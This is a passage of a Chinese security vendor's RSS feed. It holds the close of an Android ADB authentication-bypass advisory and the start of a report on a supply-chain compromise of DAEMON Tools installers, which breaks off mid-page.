月安全补丁修复该漏洞，建议受影响用户及时将 Android 设备更新至最新安全补丁。受影响的 AOSP 版本包括 Android 14、15、16、16-qpr2。</span><span leaf=""><br/></span><span leaf="">参考链接：<a href="https://source.android.com/docs/security/bulletin/2026/2026-05-01?hl=zh-cn" target="_blank">https://source.android.com/docs/security/bulletin/2026/2026-05-01?hl=zh-cn</a></span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041817" src="https://wechat2rss.xlab.app/img-proxy/?k=b883fe7f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxS6R8u2OLGPNvhwOymtm887KWmrbMAoks18HloFwArAQBurcxXm5A0RdZdyGcHMBbu6w0WpgViaTDvej6OwibiaiavxNPaQogTDOUA%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">临时修复建议</span></span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">关闭未使用的功能模块，减少潜在攻击入口。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">遵循最小权限原则，严控各类敏感操作权限范围。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">非必要不暴露服务到公网，限制访问源为可信范围。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">定期更新系统及各类组件至安全版本，及时修补已知隐患。</span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">参考链接</span></b></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://source.android.com/docs/security/bulletin/2026/2026-05-01?hl=zh-cn" target="_blank">https://source.android.com/docs/security/bulletin/2026/2026-05-01?hl=zh-cn</a></span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;font-size: 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">时间轴</span></b></p></div></div></div></div><div style="text-align: left;justify-content: flex-start;margin: 10px 0%;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="padding: 0px 6px;text-align: center;color: rgb(56, 52, 52);letter-spacing: 1px;line-height: 1;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2026/05/06</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;box-shadow: rgb(102, 188, 41) 0px 0px 0px;border-left: 2px dotted rgb(102, 188, 41);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;margin: 0px 6px 0px 12px;padding: 9px 16px 20px 24px;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(102, 102, 102);text-align: justify;letter-spacing: 1px;line-height: 1.6;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">深瞳漏洞实验室监测到Android ADB认证绕过漏洞信息。</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;margin: 10px 0%;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="padding: 0px 6px;text-align: center;color: rgb(56, 52, 52);letter-spacing: 1px;line-height: 1;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2026/05/06</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;box-shadow: rgb(102, 188, 41) 0px 0px 0px;border-left: 2px dotted rgb(102, 188, 41);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;margin: 0px 6px 0px 12px;padding: 9px 16px 20px 24px;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(102, 102, 102);text-align: justify;letter-spacing: 1px;line-height: 1.6;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">深瞳漏洞实验室发布漏洞通告。</span></p></div></div></div><div style="text-align: unset;font-size: 15px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">点击</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">阅读原文</span></span></strong><span leaf="">，及时关注并登录深信服</span><strong style="box-sizing: border-box;"><span leaf="">智安全平台</span></strong><span leaf="">，可轻松查询漏洞相关解决方案。</span></p></div><div style="text-align: unset;font-size: 15px;box-sizing: border-box;"><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5" data-s="300,640" data-type="png" data-w="1080" type="block" data-imgfileid="100041825" src="https://wechat2rss.xlab.app/img-proxy/?k=b8846fe4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FAPc6NwjLsxTNiatQHeafgUfABibnfB7g41O17gNsxicHYmaxvw0f3ZfvSouN8Sibg9aLHR3b3EibDpazmFkCiaApsU4b04RKWzYqb6yrdanRIZ6xA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4" data-s="300,640" data-type="jpeg" data-w="1280" type="block" data-imgfileid="100039351" src="https://wechat2rss.xlab.app/img-proxy/?k=ca59cfa2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2Fw8NHw6tcQ5zvcIHbwGGYKbqDVYsVKzNNia1jYtHf49C7133AlDXAgex2W4lFvpia56tjQQDkiauNBrl08YbxqG01A%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2026_16350%5cx26amp;lang=ZH-CN">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=dbfa403e&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg2NjgzNjA5NQ%3D%3D%26mid%3D2247525496%26idx%3D2%26sn%3De47ded0c6c6b5367635dba0679275333">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 06 May 2026 21:45:00 +0800</pubDate>
    </item>
    <item>
      <title>【恶意文件通告】Daemon Tools 官方安装包供应链污染事件</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&amp;mid=2247525496&amp;idx=3&amp;sn=4b2ee8a0630c8f3ccd827f1e5ba79bf7</link>
      <description>近期，深信服千里目安全技术中心监测到一起针对广受欢迎的虚拟光驱软件DAEMON TOOLS的大规模供应链投毒攻击。</description>
      <content:encoded><![CDATA[<p><span>深瞻情报实验室</span> <span>2026-05-06 21:45</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=8b4a46a2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FAPc6NwjLsxSiau3vIcJUK4WGy2Srln3H44A1YvBuWuKZyuYwA6pib2GUJppW33iagr7t1Fx9Vb5FbT9A7L1shFuHKCmOtDfd22GhYSsZe5BeJ0%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.16635687732342008" data-s="300,640" data-type="gif" data-w="1076" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041838" src="https://wechat2rss.xlab.app/img-proxy/?k=29b78dbc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxRibbjRZRpRUIVoybiaJuYvaTUkVFetTslomicG3CccNHGvw4rpIBlvjvUKnsTDPMeviaKr3kJVzZhAnvdXyz0E8qTBBv6VEkZd5ag%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 25px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 94%;vertical-align: top;border-style: solid;border-width: 1px;border-color: rgb(13, 74, 182);flex: 0 0 auto;align-self: flex-start;height: auto;box-shadow: rgb(13, 74, 182) 6px 6px 0px;background-color: rgb(255, 255, 255);box-sizing: border-box;"><div style="margin: 18px 0% 0px;box-sizing: border-box;"><div style="font-size: 15px;text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 23px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">近期，深信服千里目安全技术中心监测到一起针对广受欢迎的虚拟光驱软件DAEMON TOOLS的大规模供应链投毒攻击。攻击者成功渗透其开发商 AVB Disc Soft 的软件发布渠道，将恶意载荷注入从官网分发的安装程序，并以有效的开发者数字签名完成签署，使安全工具难以识别。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击自2026年4月8日开始，持续至报告撰写之时，涉及版本 12.5.0.2421 至 12.5.0.2434。感染波及全球逾100个国家和地区，但攻击者仅对极少数（约十余台）高价值目标机器部署后续有效载荷，显示出明显的精准化定向攻击意图。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.593103448275862" data-s="300,640" data-type="png" data-w="1015" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041836" src="https://wechat2rss.xlab.app/img-proxy/?k=9af2e653&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FAPc6NwjLsxQaapibsK1Onl5vzZibicIZwgx2uibEhib8PaYVaicc3ibiabHibicKOLLGuftVMlWdyz4kQCA7q8mHYNe1HBkbMoakeAaDWRWicnRawOwkTg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><font color="#0d4ab6" style="box-sizing: border-box;"></font></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">恶意文件概要</span></strong></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);padding: 0px;box-sizing: border-box;"><table style="border-collapse:collapse;width:426.1000pt;border:none;mso-border-left-alt:0.5000pt solid windowtext;mso-border-top-alt:0.5000pt solid windowtext;mso-border-right-alt:0.5000pt solid windowtext;mso-border-bottom-alt:0.5000pt solid windowtext;mso-border-insideh:0.5000pt solid windowtext;mso-border-insidev:0.5000pt solid windowtext;mso-padding-alt:0.0000pt 5.4000pt 0.0000pt 5.4000pt;"><tbody><tr><td data-colwidth="139" width="139" valign="center" style="padding:0pt 5.4pt;border-width:1pt;border-style:solid;border-color:#d6d6d6;"><p style="text-align:center;layout-grid-mode:char;line-height:28.0000pt;mso-line-height-rule:exactly;"><b><span style="font-family:仿宋_GB2312;mso-ascii-font-family:&#39;Times New Roman&#39;;mso-hansi-font-family:&#39;Times New Roman&#39;;mso-bidi-font-family:&#39;Times New Roman&#39;;color:rgb(0,0,0);font-weight:bold;font-size:14.0000pt;mso-font-kerning:1.0000pt;background:rgb(255,255,255);mso-shading:rgb(255,255,255);"><font face="仿宋_GB2312"><span leaf="">事件名称</span></font></span></b></p></td><td data-colwidth="712" width="712" valign="center" style="padding:0pt 5.4pt;border-width:1pt;border-style:solid;border-color:#d6d6d6;"><p style="layout-grid-mode:char;line-height:28.0000pt;mso-line-height-rule:exactly;"><span style="font-family:仿宋_GB2312;mso-ascii-font-family:&#39;Times New Roman&#39;;mso-hansi-font-family:&#39;Times New Roman&#39;;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:14.0000pt;mso-font-kerning:1.0000pt;"><font face="Times New Roman"><span leaf="">Daemon Tools </span></font><font face="仿宋_GB2312"><span leaf="">官方安装包供应链污染事件</span></font></span></p></td></tr><tr><td data-colwidth="139" width="139" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;"><p style="text-align:center;layout-grid-mode:char;line-height:28.0000pt;mso-line-height-rule:exactly;"><b><span style="font-family:&#39;Times New Roman&#39;;mso-fareast-font-family:仿宋_GB2312;color:rgb(0,0,0);font-weight:bold;font-size:14.0000pt;mso-font-kerning:1.0000pt;background:rgb(255,255,255);mso-shading:rgb(255,255,255);"><font face="仿宋_GB2312"><span leaf="">发布时间</span></font></span></b></p></td><td data-colwidth="712" width="712" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;"><p style="layout-grid-mode:char;line-height:28.0000pt;mso-line-height-rule:exactly;"><span style="font-family:仿宋_GB2312;mso-ascii-font-family:&#39;Times New Roman&#39;;mso-hansi-font-family:&#39;Times New Roman&#39;;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:14.0000pt;mso-font-kerning:1.0000pt;"><font face="Times New Roman"><span leaf="">2026</span></font></span><span style="font-family:仿宋_GB2312;mso-ascii-font-family:&#39;Times New Roman&#39;;mso-hansi-font-family:&#39;Times New Roman&#39;;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:14.0000pt;mso-font-kerning:1.0000pt;"><font face="仿宋_GB2312"><span leaf="">年</span></font></span><span style="font-family:仿宋_GB2312;mso-ascii-font-family:&#39;Times New Roman&#39;;mso-hansi-font-family:&#39;Times New Roman&#39;;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:14.0000pt;mso-font-kerning:1.0000pt;"><font face="Times New Roman"><span leaf="">5</span></font></span><span style="font-family:仿宋_GB2312;mso-ascii-font-family:&#39;Times New Roman&#39;;mso-hansi-font-family:&#39;Times New Roman&#39;;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:14.0000pt;mso-font-kerning:1.0000pt;"><font face="仿宋_GB2312"><span leaf="">月</span></font></span><span style="font-family:仿宋_GB2312;mso-ascii-font-family:&#39;Times New Roman&#39;;mso-hansi-font-family:&#39;Times New Roman&#39;;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:14.0000pt;mso-font-kerning:1.0000pt;"><font face="Times New Roman"><span leaf="">6</span></font></span><span style="font-family:仿宋_GB2312;mso-ascii-font-family:&#39;Times New Roman&#39;;mso-hansi-font-family:&#39;Times New Roman&#39;;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:14.0000pt;mso-font-kerning:1.0000pt;"><font face="仿宋_GB2312"><span leaf="">日</span></font></span></p></td></tr><tr><td data-colwidth="139" width="139" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;"><p style="text-align:center;layout-grid-mode:char;line-height:28.0000pt;mso-line-height-rule:exactly;"><b><span style="font-family:仿宋_GB2312;mso-ascii-font-family:&#39;Times New Roman&#39;;mso-hansi-font-family:&#39;Times New Roman&#39;;mso-bidi-font-family:&#39;Times New Roman&#39;;color:rgb(0,0,0);font-weight:bold;font-size:14.0000pt;mso-font-kerning:1.0000pt;background:rgb(255,255,255);mso-shading:rgb(255,255,255);"><font face="仿宋_GB2312"><span leaf="">威胁</span></font></span></b><b><span style="font-family:&#39;Times New Roman&#39;;mso-fareast-font-family:仿宋_GB2312;color:rgb(0,0,0);font-weight:bold;font-size:14.0000pt;mso-font-kerning:1.0000pt;background:rgb(255,255,255);mso-shading:rgb(255,255,255);"><font face="仿宋_GB2312"><span leaf="">类型</span></font></span></b></p></td><td data-colwidth="712" width="712" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;"><p style="layout-grid-mode:char;line-height:28.0000pt;mso-line-height-rule:exactly;"><span style="font-family:仿宋_GB2312;mso-ascii-font-family:&#39;Times New Roman&#39;;mso-hansi-font-family:&#39;Times New Roman&#39;;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:14.0000pt;mso-font-kerning:1.0000pt;"><font face="仿宋_GB2312"><span leaf="">供应链攻击、后门植入、远程控制（</span></font><font face="Times New Roman"><span leaf="">RAT</span></font><font face="仿宋_GB2312"><span leaf="">）</span></font></span></p></td></tr><tr><td data-colwidth="139" width="139" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;"><p style="text-align:center;layout-grid-mode:char;line-height:28.0000pt;mso-line-height-rule:exactly;"><b><span style="font-family:仿宋_GB2312;mso-ascii-font-family:&#39;Times New Roman&#39;;mso-hansi-font-family:&#39;Times New Roman&#39;;mso-bidi-font-family:&#39;Times New Roman&#39;;color:rgb(0,0,0);font-weight:bold;font-size:14.0000pt;mso-font-kerning:1.0000pt;background:rgb(255,255,255);mso-shading:rgb(255,255,255);"><font face="仿宋_GB2312"><span leaf="">简单描述</span></font></span></b></p></td><td data-colwidth="712" width="712" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;"><p style="layout-grid-mode:char;line-height:28.0000pt;mso-line-height-rule:exactly;"><span style="font-family:仿宋_GB2312;mso-ascii-font-family:&#39;Times New Roman&#39;;mso-hansi-font-family:&#39;Times New Roman&#39;;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:14.0000pt;mso-font-kerning:1.0000pt;"><font face="仿宋_GB2312"><span leaf="">攻击者通过攻破</span></font><font face="Times New Roman"><span leaf="">Daemon Tools </span></font><font face="仿宋_GB2312"><span leaf="">官方分发渠道，在合法的软件安装包中植入恶意后门代码，导致全球大量下载该工具的用户面临系统被完全控制的风险。</span></font></span></p></td></tr><tr><td data-colwidth="139" width="139" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;"><p style="text-align:center;layout-grid-mode:char;line-height:28.0000pt;mso-line-height-rule:exactly;"><b><span style="font-family:仿宋_GB2312;mso-ascii-font-family:&#39;Times New Roman&#39;;mso-hansi-font-family:&#39;Times New Roman&#39;;mso-bidi-font-family:&#39;Times New Roman&#39;;color:rgb(0,0,0);font-weight:bold;font-size:14.0000pt;mso-font-kerning:1.0000pt;background:rgb(255,255,255);mso-shading:rgb(255,255,255);"><font face="仿宋_GB2312"><span leaf="">关键特征</span></font></span></b></p></td><td data-colwidth="712" width="712" valign="center" style="padding:0pt 5.4pt;border-width:medium 1pt 1pt;border-style:none solid solid;border-color:#d6d6d6;"><p style="layout-grid-mode:char;line-height:28.0000pt;mso-line-height-rule:exactly;"><span style="font-family:仿宋_GB2312;mso-ascii-font-family:&#39;Times New Roman&#39;;mso-hansi-font-family:&#39;Times New Roman&#39;;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:14.0000pt;mso-font-kerning:1.0000pt;"><font face="仿宋_GB2312"><span leaf="">官方签名绕过、多阶段载荷投递、隐蔽的</span></font><font face="Times New Roman"><span leaf="">C2 </span></font><font face="仿宋_GB2312"><span leaf="">通信、针对虚拟光驱工具用户的精准打击。</span></font></span></p></td></tr></tbody></table></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">事件详述</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041837" src="https://wechat2rss.xlab.app/img-proxy/?k=57ac3f35&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxQlyP7H6V7qp6NiboXR6LEU6Hl38LjaWicbB4qNuozfE8wqXgXayKEfviagLZciapzwQibEOMDafnWT0YEzhtO4cWPHebibsUNY3C5Ew%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">攻击背景与起因</span></b></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);padding: 0px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">近期，知名虚拟光驱工具 Daemon Tools 的官方分发链遭到污染。攻击者成功入侵了 AVB Disc Soft 的软件发布基础设施。具体入侵路径目前尚未完全披露，但结合已知信息，可判断攻击者已获取：</span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">对构建/发布服务器或代码签名系统的访问权限</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">修改发布二进制文件并以合法证书重新签名的能力</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">将恶意安装包替换至官方下载服务器上的能力</span></p></li></ul><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻击者于2026年3月27日——攻击正式启动约11天前——注册了一个仿冒合法域名 daemon-tools[.]cc 的C2域名（env-check.daemontools[.]cc），显示出精密的预谋策划能力。</span></p></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041835" src="https://wechat2rss.xlab.app/img-proxy/?k=912cd60f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxTlcDHNq1jhz9S1xENLELWl3peOlVTWaibjQl7qwft1CFGeh3prm9k2OQFFxa2rD6Ne4Qg7P6MsncMeIVKt3wE4uAYFqvcRh7K4%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: 